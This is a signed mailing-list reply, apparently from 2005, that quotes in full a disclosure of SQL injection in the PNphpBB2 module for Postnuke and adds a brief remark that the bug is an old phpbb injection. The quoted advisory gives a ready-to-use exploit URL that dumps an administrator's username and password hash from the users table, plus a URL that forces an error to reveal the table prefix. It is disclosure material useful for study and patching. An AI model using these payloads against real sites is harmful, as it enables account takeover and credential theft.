Re: [ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]
In-Reply-To: <20050301221521.7282.qmail@xxxxxxxxxxxxxxxxxxxxx>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
>[Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor]
>
>Author: Jocanor
>Date: 01-03-2k5
>
>
>1. -----------introduction--------.
>
>Postnuke is an open source CMS (content management system), originally based
>in php-nuke. (www.postnuke.com)
>
>pnphpbb is a module for postnuke based in popular forum system phpbb.
>(www.phpbb.com)
>
>2. ------------the bug------------
>
>in 26 -03-04 janek vind discovers a bug in phpbb forums, in prvmsg.php file
>described in the bugtraq id 9984 and the bug affects also to php-nuke; butraq
>privades exploits for exploit this bug in php-nuke and phpbb.
>
>But the module Pnphpbb (postnuke phpbb) is also vulnerable to this issue, and
>its easy to exploit:
>
>http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql
> here]
>
>3 -------- the exploit ----------
>
>Working exploit:
>
>http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/*
>
>Show password hash for the user with uid = 2.
>
>4. ------important notes-----
>
>Note: if don't works, changue the prefix nuke_ for the valid prefix, you can
>get the valid table prefix causing an error like this:
>
>http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20'
>
>
>5----- Contact -----
>
>Author: Jocanor
>Location: Spain
>Email: jocanor [at] gmail [dot] com
>
>JoCaNoR SeCuRiTy ReaSoNS
>
>EOF.
>
Frist check
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=2650
etc.
This is sql injection in phpbb. Old sql injection..
Author: Maksymilian Arciemowicz
Email: cxib[at]securityreason[dot].com
GPG-KEY: http://securityreason/gpg/key.gpg
SECURITYREASON.COM TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)
iD8DBQFCJKMFznmvyJCR4zQRAsvMAJ9Qus2ukYRx6Y/dXMxuVb2+xwSl2QCgnyUZ
d2TP6nXTXqx+yWettkbfYuE=
=nsYW
-----END PGP SIGNATURE-----